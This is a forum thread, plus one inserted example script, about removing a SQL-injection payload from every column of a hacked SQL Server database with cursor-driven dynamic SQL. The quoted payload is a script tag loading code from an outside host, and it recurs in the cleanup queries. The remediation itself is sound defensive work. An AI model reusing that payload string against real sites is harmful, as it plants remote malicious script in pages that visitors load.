Hacked with SQL injection

iurisampaio
Starting Member

2 Posts

Posted - 2012-09-09 : 13:15:45
Hi there,

My website got hacked and my database is totally messed up with malware links placed on all its columns through a SQL injection invasion.

Surely and fortunately, I figured out that the malicious string has its length limited to 72 chars. Here it is:

"></title><script src="http://eighbo02rsbarr.rr.nu/sl.php"></script><!--



In order to fix that without losing any of the current data, I decided to remove the suspicious string from "every" column of "every" table that is infected with the malware code. To accomplish that I wrote the following plan:

Get all the tables of the database schema and all the columns of each table, as in:

SELECT t.name AS table_name, SCHEMA_NAME(schema_id) AS schema_name, c.name AS column_name
FROM sys.tables AS t
INNER JOIN sys.columns c ON t.OBJECT_ID = c.OBJECT_ID
ORDER BY schema_name, table_name;



Then, to update the value of each column, by removing "only" the malicious code, through a loop statement or whatever other statement would accomplish this task at once or step by step, using the query below...

UPDATE table_name SET column_name = RIGHT(column_name, LEN(column_name) - 72) WHERE column_name LIKE '%http://eighbo02rsbarr.rr.nu/sl.php%';



Am I on the correct path?

How would I join these two steps (get all the tables and columns, update the new value) into a plain MS SQL Server script?

visakh16
Very Important crosS Applying yaK Herder

52326 Posts

Posted - 2012-09-09 : 13:26:45
You would need cursor logic to loop through the results of the first statement, then use dynamic SQL to form the update string each time and use exec(@sql) to execute the SQL string.

------------------------------------------------------------------------------------------------------
SQL Server MVP
http://visakhm.blogspot.com/


Transact Charlie
Master Smack Fu Yak Hacker

3451 Posts

Posted - 2012-09-09 : 18:57:31
Did you eliminate your vulnerability?

Now would be an *excellent* time to audit the code...

How is access to the database secured? Via roles?



Transact Charlie
Msg 3903.. The ROLLBACK TRANSACTION request has no corresponding BEGIN TRANSACTION.
http://nosqlsolution.blogspot.co.uk/

iurisampaio
Starting Member

2 Posts

Posted - 2012-09-09 : 20:14:34
I followed your tip and wrote the query below.

However, I am still getting the following error:
UPDATE [dbo].[ProductOption] SET [ProductOptionName] = RIGHT([ProductOptionName], LEN([ProductOptionName]) - 72) WHERE [ProductOptionName] LIKE '%http://eighbo02rsbarr.rr.nu/sl.php%'
Msg 203, Level 16, State 2, Line 27
The name 'UPDATE [dbo].[ProductOption] SET [ProductOptionName] = RIGHT([ProductOptionName], LEN([ProductOptionName]) - 72) WHERE [ProductOptionName] LIKE '%http://eighbo02rsbarr.rr.nu/sl.php%'' is not a valid identifier.


Any ideas?



DECLARE @sql VARCHAR(8000)

DECLARE curUpdateQueries CURSOR FAST_FORWARD FOR
SELECT
N'UPDATE '
+ QUOTENAME(SCHEMA_NAME(t.schema_id))
+ N'.'
+ QUOTENAME(t.name)
+ N' SET '
+ QUOTENAME(c.name)
+ N' = RIGHT(' + QUOTENAME(c.name) + N', LEN(' + QUOTENAME(c.name) + ') - 72)'
+ N' WHERE ' + QUOTENAME(c.name) + N' LIKE ''%http://eighbo02rsbarr.rr.nu/sl.php%'''
FROM sys.tables AS t
JOIN sys.columns AS c ON t.object_id = c.object_id
JOIN sys.types AS ty ON ty.system_type_id = c.system_type_id AND ty.user_type_id = c.user_type_id
WHERE
ty.name IN(N'varchar', N'char', N'nvarchar', N'nchar')
AND OBJECTPROPERTY(t.object_id, 'IsMSShipped') = 0;

OPEN CurUpdateQueries
FETCH NEXT FROM curUpdateQueries INTO @sql

WHILE @@FETCH_STATUS = 0
BEGIN
PRINT @SQL
-- If you want to execute
EXEC @SQL
FETCH NEXT FROM curUpdateQueries INTO @sql
END
CLOSE curUpdateQueries
DEALLOCATE curUpdateQueries

Transact Charlie
Master Smack Fu Yak Hacker

3451 Posts

Posted - 2012-09-10 : 04:07:36
If you call dynamic SQL with EXEC you have to wrap it in ( ).

Change

-- If you want to execute
EXEC @SQL

To

EXEC (@SQL)


Transact Charlie
Msg 3903.. The ROLLBACK TRANSACTION request has no corresponding BEGIN TRANSACTION.
http://nosqlsolution.blogspot.co.uk/
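As an added example (not code from the thread or its posters), here is a version of the cursor-plus-dynamic-SQL approach that uses REPLACE so the payload is removed wherever it sits in the value, passes the payload to sp_executesql as a parameter instead of splicing it into the statement text, and defaults to a dry run that only prints the statements. The @dry_run flag, the @n output parameter and the cursor name are my own; the payload string is the one quoted in the first post.

```sql
-- Added example (not code from the thread): strip an injected string from every
-- char/varchar/nchar/nvarchar column of every user table, wherever it appears.
-- @dry_run and the cursor name are my own; the payload is the one quoted in the thread.
SET NOCOUNT ON;

DECLARE @payload NVARCHAR(200) =
    N'"></title><script src="http://eighbo02rsbarr.rr.nu/sl.php"></script><!--';
DECLARE @dry_run BIT = 1;   -- 1 = only print the statements, 0 = execute them
DECLARE @sql NVARCHAR(MAX), @n INT;

-- One UPDATE per character column. REPLACE removes the payload wherever it sits,
-- so nothing about its position or length (the 72 in the thread) is assumed.
-- CHARINDEX avoids LIKE wildcard surprises if a payload ever contains % _ or [.
DECLARE cur CURSOR LOCAL FAST_FORWARD FOR
    SELECT N'UPDATE ' + QUOTENAME(SCHEMA_NAME(t.schema_id)) + N'.' + QUOTENAME(t.name)
         + N' SET ' + QUOTENAME(c.name)
         + N' = REPLACE(' + QUOTENAME(c.name) + N', @p, N'''')'
         + N' WHERE CHARINDEX(@p, ' + QUOTENAME(c.name) + N') > 0;'
         + N' SET @n = @@ROWCOUNT;'
    FROM sys.tables  AS t
    JOIN sys.columns AS c  ON c.object_id = t.object_id
    JOIN sys.types   AS ty ON ty.user_type_id = c.user_type_id
    WHERE ty.name IN (N'char', N'varchar', N'nchar', N'nvarchar')  -- (max) included; text/ntext are not
      AND t.is_ms_shipped = 0;

OPEN cur;
FETCH NEXT FROM cur INTO @sql;
WHILE @@FETCH_STATUS = 0
BEGIN
    PRINT @sql;
    IF @dry_run = 0
    BEGIN
        -- The payload travels as a parameter, not as text spliced into the statement.
        EXEC sp_executesql @sql, N'@p NVARCHAR(200), @n INT OUTPUT', @p = @payload, @n = @n OUTPUT;
        PRINT N'    rows updated: ' + CAST(@n AS NVARCHAR(20));
    END;
    FETCH NEXT FROM cur INTO @sql;
END;
CLOSE cur;
DEALLOCATE cur;
```

Run it once with @dry_run = 1 and read the printed statements before switching to 0, and take a backup first, since the UPDATEs are not wrapped in a transaction here.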

madhivanan
Premature Yak Congratulator

22864 Posts

Posted - 2012-09-13 : 04:15:04
This will give you a list of the tables and columns where the string is found:
http://beyondrelational.com/modules/2/blogs/70/posts/10883/search-a-value-in-character-column-of-all-tables.aspx

Madhivanan

Failing to plan is Planning to fail